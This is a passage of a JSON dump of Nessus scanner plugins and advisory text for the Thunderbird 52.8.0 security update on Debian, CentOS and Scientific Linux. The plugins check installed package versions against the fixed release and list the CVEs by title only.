reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-eu\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-fi\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-fr\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-fy-nl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-ga-ie\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-gd\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-gl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-he\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-hr\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-hsb\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-hu\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-hy-am\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-id\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-is\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-it\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-ja\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-kab\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-ko\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-lt\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-nb-no\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-nl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-nn-no\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-pa-in\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-pl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-pt-br\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-pt-pt\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-rm\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-ro\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-ru\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-si\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-sk\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-sl\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-sq\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-sr\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-sv-se\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-ta-lk\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-tr\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-uk\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-vi\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-zh-cn\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"thunderbird-l10n-zh-tw\", reference:\"1:52.8.0-1~deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-31T17:06:32", "description": "An update for thunderbird is now available for Red Hat Enterprise\nLinux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es) :\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8\n(CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths\n(CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths\n(CVE-2018-5155)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia\n(CVE-2018-5159)\n\n* Mozilla: Full plaintext recovery in S/MIME via chosen-ciphertext\nattack (CVE-2018-5184)\n\n* Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n* Mozilla: Encrypted mail leaks plaintext through src attribute\n(CVE-2018-5162)\n\n* Mozilla: Lightweight themes can be installed without user\ninteraction (CVE-2018-5168)\n\n* Mozilla: Filename spoofing for external attachments (CVE-2018-5170)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion\nthrough legacy extension (CVE-2018-5178)\n\n* Mozilla: Leaking plaintext through HTML forms (CVE-2018-5185)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting\nCVE-2018-5150, CVE-2018-5154, CVE-2018-5155, CVE-2018-5159,\nCVE-2018-5168, CVE-2018-5178, and CVE-2018-5183. Upstream acknowledges\nChristoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald\nCrane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla\nDevelopers, Nils, Ivan Fratric, Wladimir Palant, and Root Object as\nthe original reporters.", "edition": 22, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-30T00:00:00", "title": "CentOS 6 : thunderbird (CESA-2018:1726)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "modified": "2018-05-30T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:thunderbird"], "id": "CENTOS_RHSA-2018-1726.NASL", "href": "https://www.tenable.com/plugins/nessus/110206", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:1726 and \n# CentOS Errata and Security Advisory 2018:1726 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110206);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5159\", \"CVE-2018-5161\", \"CVE-2018-5162\", \"CVE-2018-5168\", \"CVE-2018-5170\", \"CVE-2018-5178\", \"CVE-2018-5183\", \"CVE-2018-5184\", \"CVE-2018-5185\");\n script_xref(name:\"RHSA\", value:\"2018:1726\");\n\n script_name(english:\"CentOS 6 : thunderbird (CESA-2018:1726)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for thunderbird is now available for Red Hat Enterprise\nLinux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es) :\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8\n(CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths\n(CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths\n(CVE-2018-5155)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia\n(CVE-2018-5159)\n\n* Mozilla: Full plaintext recovery in S/MIME via chosen-ciphertext\nattack (CVE-2018-5184)\n\n* Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n* Mozilla: Encrypted mail leaks plaintext through src attribute\n(CVE-2018-5162)\n\n* Mozilla: Lightweight themes can be installed without user\ninteraction (CVE-2018-5168)\n\n* Mozilla: Filename spoofing for external attachments (CVE-2018-5170)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion\nthrough legacy extension (CVE-2018-5178)\n\n* Mozilla: Leaking plaintext through HTML forms (CVE-2018-5185)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting\nCVE-2018-5150, CVE-2018-5154, CVE-2018-5155, CVE-2018-5159,\nCVE-2018-5168, CVE-2018-5178, and CVE-2018-5183. Upstream acknowledges\nChristoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald\nCrane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla\nDevelopers, Nils, Ivan Fratric, Wladimir Palant, and Root Object as\nthe original reporters.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2018-May/022846.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?53b0e354\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-5150\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"thunderbird-52.8.0-2.el6.centos\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-31T20:39:05", "description": "This update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es) :\n\n - Mozilla: Memory safety bugs fixed in Firefox 60 and\n Firefox ESR 52.8 (CVE-2018-5150)\n\n - Mozilla: Backport critical security fixes in Skia\n (CVE-2018-5183)\n\n - Mozilla: Use-after-free with SVG animations and clip\n paths (CVE-2018-5154)\n\n - Mozilla: Use-after-free with SVG animations and text\n paths (CVE-2018-5155)\n\n - Mozilla: Integer overflow and out-of-bounds write in\n Skia (CVE-2018-5159)\n\n - Mozilla: Full plaintext recovery in S/MIME via\n chosen-ciphertext attack (CVE-2018-5184)\n\n - Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n - Mozilla: Encrypted mail leaks plaintext through src\n attribute (CVE-2018-5162)\n\n - Mozilla: Lightweight themes can be installed without\n user interaction (CVE-2018-5168)\n\n - Mozilla: Filename spoofing for external attachments\n (CVE-2018-5170)\n\n - Mozilla: Buffer overflow during UTF-8 to Unicode string\n conversion through legacy extension (CVE-2018-5178)\n\n - Mozilla: Leaking plaintext through HTML forms\n (CVE-2018-5185)", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-25T00:00:00", "title": "Scientific Linux Security Update : thunderbird on SL6.x i386/x86_64 (20180524)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "modified": "2018-05-25T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:thunderbird", "p-cpe:/a:fermilab:scientific_linux:thunderbird-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20180524_THUNDERBIRD_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/110121", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110121);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5159\", \"CVE-2018-5161\", \"CVE-2018-5162\", \"CVE-2018-5168\", \"CVE-2018-5170\", \"CVE-2018-5178\", \"CVE-2018-5183\", \"CVE-2018-5184\", \"CVE-2018-5185\");\n\n script_name(english:\"Scientific Linux Security Update : thunderbird on SL6.x i386/x86_64 (20180524)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es) :\n\n - Mozilla: Memory safety bugs fixed in Firefox 60 and\n Firefox ESR 52.8 (CVE-2018-5150)\n\n - Mozilla: Backport critical security fixes in Skia\n (CVE-2018-5183)\n\n - Mozilla: Use-after-free with SVG animations and clip\n paths (CVE-2018-5154)\n\n - Mozilla: Use-after-free with SVG animations and text\n paths (CVE-2018-5155)\n\n - Mozilla: Integer overflow and out-of-bounds write in\n Skia (CVE-2018-5159)\n\n - Mozilla: Full plaintext recovery in S/MIME via\n chosen-ciphertext attack (CVE-2018-5184)\n\n - Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n - Mozilla: Encrypted mail leaks plaintext through src\n attribute (CVE-2018-5162)\n\n - Mozilla: Lightweight themes can be installed without\n user interaction (CVE-2018-5168)\n\n - Mozilla: Filename spoofing for external attachments\n (CVE-2018-5170)\n\n - Mozilla: Buffer overflow during UTF-8 to Unicode string\n conversion through legacy extension (CVE-2018-5178)\n\n - Mozilla: Leaking plaintext through HTML forms\n (CVE-2018-5185)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1805&L=scientific-linux-errata&F=&S=&P=26996\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0690ee69\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected thunderbird and / or thunderbird-debuginfo\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:thunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"thunderbird-52.8.0-2.el6_9\", allowmaj:TRUE)) flag++;\nif (rpm_check(release:\"SL6\", reference:\"thunderbird-debuginfo-52.8.0-2.el6_9\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird / thunderbird-debuginfo\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-31T20:39:05", "description": "This update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es) :\n\n - Mozilla: Memory safety bugs fixed in Firefox 60 and\n Firefox ESR 52.8 (CVE-2018-5150)\n\n - Mozilla: Backport critical security fixes in Skia\n (CVE-2018-5183)\n\n - Mozilla: Use-after-free with SVG animations and clip\n paths (CVE-2018-5154)\n\n - Mozilla: Use-after-free with SVG animations and text\n paths (CVE-2018-5155)\n\n - Mozilla: Integer overflow and out-of-bounds write in\n Skia (CVE-2018-5159)\n\n - Mozilla: Full plaintext recovery in S/MIME via\n chosen-ciphertext attack (CVE-2018-5184)\n\n - Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n - Mozilla: Encrypted mail leaks plaintext through src\n attribute (CVE-2018-5162)\n\n - Mozilla: Lightweight themes can be installed without\n user interaction (CVE-2018-5168)\n\n - Mozilla: Filename spoofing for external attachments\n (CVE-2018-5170)\n\n - Mozilla: Buffer overflow during UTF-8 to Unicode string\n conversion through legacy extension (CVE-2018-5178)\n\n - Mozilla: Leaking plaintext through HTML forms\n (CVE-2018-5185)", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-25T00:00:00", "title": "Scientific Linux Security Update : thunderbird on SL7.x x86_64 (20180524)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "modified": "2018-05-25T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:thunderbird", "p-cpe:/a:fermilab:scientific_linux:thunderbird-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20180524_THUNDERBIRD_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/110122", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110122);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5159\", \"CVE-2018-5161\", \"CVE-2018-5162\", \"CVE-2018-5168\", \"CVE-2018-5170\", \"CVE-2018-5178\", \"CVE-2018-5183\", \"CVE-2018-5184\", \"CVE-2018-5185\");\n\n script_name(english:\"Scientific Linux Security Update : thunderbird on SL7.x x86_64 (20180524)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es) :\n\n - Mozilla: Memory safety bugs fixed in Firefox 60 and\n Firefox ESR 52.8 (CVE-2018-5150)\n\n - Mozilla: Backport critical security fixes in Skia\n (CVE-2018-5183)\n\n - Mozilla: Use-after-free with SVG animations and clip\n paths (CVE-2018-5154)\n\n - Mozilla: Use-after-free with SVG animations and text\n paths (CVE-2018-5155)\n\n - Mozilla: Integer overflow and out-of-bounds write in\n Skia (CVE-2018-5159)\n\n - Mozilla: Full plaintext recovery in S/MIME via\n chosen-ciphertext attack (CVE-2018-5184)\n\n - Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n - Mozilla: Encrypted mail leaks plaintext through src\n attribute (CVE-2018-5162)\n\n - Mozilla: Lightweight themes can be installed without\n user interaction (CVE-2018-5168)\n\n - Mozilla: Filename spoofing for external attachments\n (CVE-2018-5170)\n\n - Mozilla: Buffer overflow during UTF-8 to Unicode string\n conversion through legacy extension (CVE-2018-5178)\n\n - Mozilla: Leaking plaintext through HTML forms\n (CVE-2018-5185)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1805&L=scientific-linux-errata&F=&S=&P=26474\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?33daa918\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected thunderbird and / or thunderbird-debuginfo\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:thunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) 